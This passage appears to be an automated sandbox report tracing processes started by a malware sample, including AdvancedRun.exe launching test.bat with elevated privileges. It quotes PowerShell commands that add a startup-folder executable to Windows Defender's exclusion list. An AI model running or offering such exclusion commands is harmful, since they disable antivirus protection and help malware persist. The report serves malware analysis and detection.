                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      Analysis Process: WerFault.exe PID: 6376 Parent PID: 4328

                                                                                      General

                                                                                      Start time:08:54:21
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                                                                                      Imagebase:0x1170000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: AdvancedRun.exe PID: 4888 Parent PID: 5628

                                                                                      General

                                                                                      Start time:08:54:23
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: AdvancedRun.exe PID: 6968 Parent PID: 3132

                                                                                      General

                                                                                      Start time:08:54:26
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: AdvancedRun.exe PID: 7052 Parent PID: 6468

                                                                                      General

                                                                                      Start time:08:54:27
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      Analysis Process: AdvancedRun.exe PID: 7060 Parent PID: 4888

                                                                                      General

                                                                                      Start time:08:54:29
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: AdvancedRun.exe PID: 7032 Parent PID: 6672

                                                                                      General

                                                                                      Start time:08:54:29
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: AdvancedRun.exe PID: 6368 Parent PID: 7052

                                                                                      General

                                                                                      Start time:08:54:32
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                                                                                      Imagebase:0x400000
                                                                                      File size:91000 bytes
                                                                                      MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 3016 Parent PID: 7004

                                                                                      General

                                                                                      Start time:08:54:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 5056 Parent PID: 3016

                                                                                      General

                                                                                      Start time:08:54:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Analysis Process: powershell.exe PID: 5052 Parent PID: 7004

                                                                                      General

                                                                                      Start time:08:54:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Analysis Process: conhost.exe PID: 6912 Parent PID: 5052

                                                                                      General

                                                                                      Start time:08:54:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >